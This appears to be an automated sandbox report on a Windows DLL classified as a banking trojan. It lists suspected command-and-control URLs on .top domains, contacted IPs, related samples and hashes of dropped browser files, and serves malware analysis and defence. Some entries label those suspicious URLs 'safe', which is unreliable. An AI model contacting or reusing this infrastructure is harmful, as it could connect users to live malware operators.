            http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC5mrcZE6ZGUWjS/LKs0W_2FZrtLgELoKDEbZR/8X1_2FxjVbkZk/tVcM_2Bd/jQmX3NhgeWRqCDsfD_2BayQ/lSPwdIYz4P/81sFvcaWcXolUgVkt/y_2B1p3Gvpg_/2F0X2_2F87o/JZseyqJj/p.avifalse
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tOgQJzDbLce.dllfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.nytimes.com/msapplication.xml3.13.drfalse
              high
              http://babidone.top/images/PPpwiauX_2BIh4oFWqX/Djwkz7R93cFnDrrKCEfupn/1lc9UumTDGjRL/5auxQAs_/2B38Hwp~DFD4CA446EF33C2D57.TMP.20.dr, {77F8D092-5439-11EB-90EB-ECF4BBEA1588}.dat.20.drfalse
              • Avira URL Cloud: safe
              unknown
              http://ocsp.sectigo.com0OgQJzDbLce.dllfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/ploaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#OgQJzDbLce.dllfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.youtube.com/msapplication.xml7.13.drfalse
                high
                https://sectigo.com/CPS0DOgQJzDbLce.dllfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.wikipedia.com/msapplication.xml6.13.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.amazon.com/msapplication.xml.13.drfalse
                  high
                  http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGCloaddll32.exe, 00000000.00000002.1018085048.0000000001697000.00000004.00000020.sdmp, ~DF4EBD4894B35EDD90.TMP.25.dr, {9B722639-5439-11EB-90EB-ECF4BBEA1588}.dat.25.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.live.com/msapplication.xml2.13.drfalse
                    high
                    http://www.reddit.com/msapplication.xml4.13.drfalse
                      high
                      http://www.twitter.com/msapplication.xml5.13.drfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        193.56.255.166
                        unknownRomania
                        213137INFOCLOUD-SRLMDfalse
                        92.38.132.181
                        unknownAustria
                        199524GCOREATfalse

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:338189
                        Start date:11.01.2021
                        Start time:19:16:27
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 47s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:OgQJzDbLce.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:27
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal68.bank.troj.winDLL@13/44@3/3
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 96.1% (good quality ratio 90.2%)
                        • Quality average: 78.5%
                        • Quality standard deviation: 29%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .dll
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 52.255.188.83, 51.104.139.180, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210, 51.11.168.160, 88.221.62.148, 152.199.19.161
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, updates.microsoft.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, cs9.wpc.v0cdn.net
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        INFOCLOUD-SRLMD5fd9d7ec9e7aetar.dllGet hashmaliciousBrowse
                        • 193.56.255.167
                        GCOREAT8WLxD8uxRN.exeGet hashmaliciousBrowse
                        • 5.188.6.146
                        https://kiankaziataad.com/shop/images/homebanners/errGet hashmaliciousBrowse
                        • 185.105.3.162
                        LmlSW3qU2x.exeGet hashmaliciousBrowse
                        • 92.223.105.117
                        https://sleekearflap.com//shareform/index.phpGet hashmaliciousBrowse
                        • 92.38.163.8
                        https://www.google.com/url?q=https://canadian-pills-store.su/?cp%3Dsalesx&sa=D&ust=1608032187237000&usg=AOvVaw2CTXjcE4npPvhIiuTL-ItlGet hashmaliciousBrowse
                        • 5.188.0.147
                        https://ofd.beeline.ru/check-order/oxjsoinmqGet hashmaliciousBrowse
                        • 92.223.97.97
                        https://www.wunba.com/Get hashmaliciousBrowse
                        • 92.223.97.97
                        https://ngor.zlen.com.ua/Restore/Click here to restore message automatically.htmlGet hashmaliciousBrowse
                        • 92.223.97.97
                        mXlHxlkrkB.exeGet hashmaliciousBrowse
                        • 146.185.219.29
                        Rawan inquiry.docGet hashmaliciousBrowse
                        • 92.223.93.172
                        5e3Dtdp1dU.exeGet hashmaliciousBrowse
                        • 185.101.139.252
                        KqVNXoOE85.exeGet hashmaliciousBrowse
                        • 45.135.229.212
                        xl.png.exeGet hashmaliciousBrowse
                        • 5.188.38.80
                        corp-fin.xlsbGet hashmaliciousBrowse
                        • 5.188.38.80
                        Ghj736i4Ht.exeGet hashmaliciousBrowse
                        • 185.105.1.149
                        slip copy.exeGet hashmaliciousBrowse
                        • 45.135.229.212
                        Receipt+00034587583883.exeGet hashmaliciousBrowse
                        • 92.223.105.174
                        Angebot_09082020_148.xlsGet hashmaliciousBrowse
                        • 5.188.0.171
                        INV15 .docmGet hashmaliciousBrowse
                        • 92.38.135.61
                        Tagesprotokoll_G0001_20200911.xlsmGet hashmaliciousBrowse
                        • 5.188.0.251

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5E3D54B5-5439-11EB-90EB-ECF4BBEA1588}.dat
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):29272
                        Entropy (8bit):1.7677795101409812
                        Encrypted:false
                        SSDEEP:48:IwchGcpru6GwpL0TG/ap8SXrGIpcdGvnZpvpGo/Pqp9AGo4LlzpmBGW/5zTUCGWP:roZfZs2y9W6tVifDLlzML94O6vZBX2pB
                        MD5:F19EB8802FE83029B13BCFB8D2C6C307
                        SHA1:0D661CEF7AAD0B1567866B0C476D9256F1164241
                        SHA-256:E5EFDD1A001C6136C17563097E5018D0AF6407B53B9E82E29220228A345A7010
                        SHA-512:54E35057744434433BF64ED4DB17BB0C2185B5DAE63E55F4E21BBC52369BB6C7626F7B3320E315307B337B3F479DD7355A7DFD7E0A4651A9C515E1B5B1FF8646
                        Malicious:false
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{77F8D090-5439-11EB-90EB-ECF4BBEA1588}.dat
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):29272
                        Entropy (8bit):1.7727430226053469
                        Encrypted:false
                        SSDEEP:96:r/ZQZgV2gRO9WgRPztgRPA8ifgRPA2zeszMgRPCU2VEeN68gBgR2CU2hDpB:r/ZQZ62d9WOtWifmeszMrEG68gBSDpB
                        MD5:83E4BBBE72AD06F58B5B436C654DD4F9
                        SHA1:D9E6660D3F2750BC06D3399A9A74EF5F0B9E6D5A
                        SHA-256:80F10776BF6323447A2448168B3BB752ECB5E0DA4DC2300F61B1F239B51871AB
                        SHA-512:CB1ADE72BCFDBF4950BDF392CD62E539A695B7FD4A310946179AF67E220A9592AEF70E42F96BE7251915F378B1DC813E1CC66E5B61DE29AFA52A2791FE13EE63
                        Malicious:false
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8DCAF18E-5439-11EB-90EB-ECF4BBEA1588}.dat
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):29272
                        Entropy (8bit):1.767609996176377
                        Encrypted:false
                        SSDEEP:192:rHZtZo2y9W4mt4Uif4cVrzM4XDp6j3BLEpB:r5D/yUBamrM
                        MD5:40625874579526CBE836AA9E298C4BCC
                        SHA1:72242BC794C34E86D9F6D273F42D393ECC5AFE68
                        SHA-256:4E1165C23BD8EE6B5EB26D8C9D4E14D8E2AE86A672A0467522A735A13C1EB8E5
                        SHA-512:EABE9A27C1F0FD2EC0FCCFFD46248C7D609E096CBB10EE34FEE2183DE53E1CA53E40FF09287BE6D5A9DC258EB957B533896720555CB5EB8B4029D8CB6E47D97A
                        Malicious:false
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9B722637-5439-11EB-90EB-ECF4BBEA1588}.dat
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):29272
                        Entropy (8bit):1.7689336572294374
                        Encrypted:false
                        SSDEEP:48:IwcGcprJGwpLL6G/ap8LmrGIpcLGGvnZpvL7GolPqp9LGGo4h/zpmLxGWl5ZT+GP:rAZjZ0269WXtVifdh/zM9Ho6NzBIgpB
                        MD5:26964069B5AB1183C6F019622544C827
                        SHA1:2F4BA0A68FF90B1FF1AC3AA69DCCC64BEFFA7E66
                        SHA-256:66F84454F3368C4080EDF55E3EE6CD0E7DE2A6F568CD156F02B2D13615716C5B
                        SHA-512:C12F1922535948BA26B21EA9C5ED9246C869EC684A30561C62DB2AB485501F0F2FDBE202AEB1880CAC42BCC9996513F3EBB66EA4E0B4C845CB2976D7F623BF85
                        Malicious:false
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E3D54B7-5439-11EB-90EB-ECF4BBEA1588}.dat
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):27368
                        Entropy (8bit):1.8430070309605113
                        Encrypted:false
                        SSDEEP:96:r4ZLQt6DBSIFjZ2QkWBMwYiy6R9xy6RWWciA:r4ZLQt6DkIFjZ2QkWBMwYiyOxy/iA
                        MD5:513141E5326F0E8893D18F6B6CF4ECC9
                        SHA1:34E8DB4E1CA1B189129034CCFFC2F89D28B1141B
                        SHA-256:33863CF59E31800B4A818618BF56BF1E408310CF474B079583065CE3268F8168
                        SHA-512:1D4C9751793F1B566192A614E9265CF2B017C4B511024244862260619F861FC1A1C30BBAA6EB0EDA9369B6DFF3608C93FDEE07294F4A9D58C6531614D0538DD3
                        Malicious:false
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{77F8D092-5439-11EB-90EB-ECF4BBEA1588}.dat
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):27360
                        Entropy (8bit):1.841214254937248
                        Encrypted:false
                        SSDEEP:192:r4ZfQ761k7FjV24kWXeMISYqxboZRxbo6b2KA:r4Y++7hM8X3ISfxbuxbBb2t
                        MD5:EFC9DBE9B1A00BC2B3183437EABF9EA3
                        SHA1:0012ACD6D98242CF5187119CE7514975FB2FF588
                        SHA-256:16D2B449F031BFFECEB7AD22C8367515B1D83DD80DC95ABFAA8B94A500B63937
                        SHA-512:6F43DFFC3E0AF0B68CD13E0D7A5C70FD8F895AED60D6D46CF88DF6C47202138CF2BA3F7A6912FF8B938CC8F915F8B4162D52CFCCACA7AF10972D3920A87A85A8
                        Malicious:false
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8DCAF190-5439-11EB-90EB-ECF4BBEA1588}.dat
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):27376
                        Entropy (8bit):1.8472568777610467
                        Encrypted:false
                        SSDEEP:192:rqZBQt6Hk1Fjh2TkWoMHY6ewpJxewp56A:rWWYE1hQ3NHvewpXewp59
                        MD5:D33C7184E23B721DCFC9E112AACACDC0
                        SHA1:83E519B4B762340A3C01618B9C6BB15F6E926E4D
                        SHA-256:B1F97C3D3BA1233DA5EE5D52FEB6378519CE2320E648C38746CC13A6F95C392D
                        SHA-512:1CBD446F3DA475E2213B965C121EE73B03FBC9AA05B725B085C2B2526DD78743F9BBAEFFAA65E657F3EB04DE901D4AF14B4E9AC3BBBB78C2D467FC63871763EE
                        Malicious:false
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9B722639-5439-11EB-90EB-ECF4BBEA1588}.dat
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:Microsoft Word Document
                        Category:dropped
                        Size (bytes):27368
                        Entropy (8bit):1.8403358832338321
                        Encrypted:false
                        SSDEEP:192:r9ZmQC6QkiFjp2jkWwMPYin4Ozxn4Oc8iA:rTztdih4HFPH4O4qV
                        MD5:34D74AFEC96FDAF1AC3EC81B56E035A4
                        SHA1:1D41B818ADAA1D9D1F974EEB0CD963D4921E0334
                        SHA-256:FDD9D1EB2FA4628FC123AF5515F053BF4F6A5296C657D783509809CC4C1BB814
                        SHA-512:DC4199F013F4A0C4B7085D38DC5919CB85276FE80BF7FF435445C84E62980AE6F9CAE8BCB686FF163C983FF2146A7B0FFF59E8F848E87E9BA4A9DA53D6B8EB04
                        Malicious:false
                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):656
                        Entropy (8bit):5.123118361083354
                        Encrypted:false
                        SSDEEP:12:TMHdNMNxOECDr8nWimI002EtM3MHdNMNxOECDr8nWimI00OYGVbkEtMb:2d6NxORDr8SZHKd6NxORDr8SZ7YLb
                        MD5:7E6B49EEC0BEB1BC27E4DED68249CE03
                        SHA1:66533E523D676017CA1AC096F01B45EFC432D5B3
                        SHA-256:92AB2E98CCA3A2E4DBFEFD4A84B850B7F9E47391B88B5FB2329DA36A5C82BEB6
                        SHA-512:0DE3346DC82FB930C4A0F4D4E293003CB914F8CD9D8CBAD5F98FBCC0E20B9974DEEDB6EACFFE3A2857BF17609F3585FF8EB8BF6DF7346D0E2BFCB77E794C03CD
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):653
                        Entropy (8bit):5.11901366828337
                        Encrypted:false
                        SSDEEP:12:TMHdNMNxe2kDfcDqfc8nWimI002EtM3MHdNMNxe2kDfcDqfc8nWimI00OYGkak6t:2d6NxrLDd8SZHKd6NxrLDd8SZ7Yza7b
                        MD5:CF6C928DA3DBC3459C96F4CC79D40C92
                        SHA1:9A12BC347C3F0BEDA3725FD6DD42DD4DEF73FE5C
                        SHA-256:26AF633EFA78F94B59A2ED6E838C1A29D982D1D13B04410B6FBDDAC187EEB7ED
                        SHA-512:C4A20F0013DBACDD1D09DCF593CA1C4F312402077B881317384D27744043C0B7D8B93BE6221DB6C11FB97FD7B4ABFEE32365F08E821F1132BBE28FE8035AAB26
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x33a132c6,0x01d6e846</date><accdate>0x33a132c6,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x33a132c6,0x01d6e846</date><accdate>0x33a132c6,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):662
                        Entropy (8bit):5.142286717418112
                        Encrypted:false
                        SSDEEP:12:TMHdNMNxvLCDr8nWimI002EtM3MHdNMNxvLCDr8nWimI00OYGmZEtMb:2d6Nxv2Dr8SZHKd6Nxv2Dr8SZ7Yjb
                        MD5:8AA7C1AE009F7157E9C6CEA1B4FE8BB3
                        SHA1:CCD372C471932E57785792BB622A12D4842AEF90
                        SHA-256:41F1F5F4B50D4CAF46FC5B1E2C086FA7A8D189CD3A77F958F1DB30E966F22541
                        SHA-512:865D8552587DABD0550923067AC8CF21F0302C61E522F6158E45F496F10FD3104C4BCF5D8EB69B61FD29DCBAC00EF49A0B7BB35AB32E24433F54C54942A84CCB
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):647
                        Entropy (8bit):5.132012535046788
                        Encrypted:false
                        SSDEEP:12:TMHdNMNxiqVVDXVV8nWimI002EtM3MHdNMNxiqVVDXVV8nWimI00OYGd5EtMb:2d6NxDLDXL8SZHKd6NxDLDXL8SZ7YEjb
                        MD5:95C939A865C8101F80CEDC1DE98A4361
                        SHA1:BDEC37EE7FE60CAABE53594F681A3A0FB54E570E
                        SHA-256:A825DE7F2D3734780282ECAD82F28538A9F0F12E974EBE63A5E3F9B699C4FBEB
                        SHA-512:A478801B40A0AA5B391BC6607390AF931EC2BC11CC6AA7480799282A76FA9D4B545EBE2C87D79DCE8290E7B4FF7A59D75625B8E5EB438C91478C1C4669EE80FC
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):656
                        Entropy (8bit):5.157419814247615
                        Encrypted:false
                        SSDEEP:12:TMHdNMNxhGwCDr8nWimI002EtM3MHdNMNxhGwCDr8nWimI00OYG8K075EtMb:2d6NxQdDr8SZHKd6NxQdDr8SZ7YrKajb
                        MD5:8930BB5A619E764D208825B40ADB9C1B
                        SHA1:4BEB28A7403DD7AE4AA4E2716423295C92B1AA85
                        SHA-256:603EBB0035DEB07CAE4A5C1047A0497858413F8F8DBEE33B1538DC93AB5A7FD0
                        SHA-512:80A1313C37CF49532395952CD44C20431C28476EB822FAE565A06E6133CA888D5D1497D95551B2D6778AE00B4AA1B9D4F5BF6A0A30F99F0E895856914D707B30
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):653
                        Entropy (8bit):5.120104889948707
                        Encrypted:false
                        SSDEEP:12:TMHdNMNx0nqVVDXVV8nWimI002EtM3MHdNMNx0nqVVDXVV8nWimI00OYGxEtMb:2d6Nx0qLDXL8SZHKd6Nx0qLDXL8SZ7Yu
                        MD5:900F7E70BF1A18DEF2B8F775034AD5C0
                        SHA1:16A95BB43A7CC44A2D1CC3A7C658A7EE87BF59A7
                        SHA-256:33BB8311F998AB5963614127CFCD20CB4FB815F895717981136AFEAD57B0E081
                        SHA-512:A013E2F164B9567401D259EFE4B91EA555B4B6A154B948819A0BBE75CFD315722FABC2BBEBF8B6AC0FE59A6927745CFE17764D9E6270879DBC72C2F1874847D9
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):656
                        Entropy (8bit):5.155875441719391
                        Encrypted:false
                        SSDEEP:12:TMHdNMNxxqVVDXVV8nWimI002EtM3MHdNMNxxqVVDXVV8nWimI00OYG6Kq5EtMb:2d6NxILDXL8SZHKd6NxILDXL8SZ7Yhb
                        MD5:94DEE2D982F6B090513529E3C081F2BB
                        SHA1:A2AB3F04ED9CCC98B45D647F164CF17068C330E6
                        SHA-256:B8F299722A651BFB5B335B51ED6C0843010CE50707E8E0EA256A5DA4CBDBD0EA
                        SHA-512:911E6624B3FDFD109BB9C89EC2A6572FCF1C5A110D9484D05A2626E93CFCC59AFE868B3E6A37FB65F8CDE780D7772B0035E1F6C2CDE7CE63BB107E4D296624F0
                        Malicious:false
                        Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x33a5f732,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):659
                        Entropy (8bit):5.104813971265666
                        Encrypted:false
                        SSDEEP:12:TMHdNMNxcvRfDKRf8nWimI002EtM3MHdNMNxcvRfDKRf8nWimI00OYGVEtMb:2d6NxIRfDKRf8SZHKd6NxIRfDKRf8SZ9
                        MD5:C8FD4280CD70F937103A9AF732E3DD4E
                        SHA1:A374A611046247FF1857B101DB71DC443824FA19
                        SHA-256:8B141F38B3ACF2D58766274C0133B878ECEA2EDBC4B78F057A441EBD2E3E903F
                        SHA-512:A50A5D49DC8A11B9A121E7B66BE8FC3C0115D56105B81EEE85DA791D4F11CB8E8D293AA216ADFC6147E3FB76E8D532358760E15A6E520BB537E08066D8DC7615
                        Malicious:false
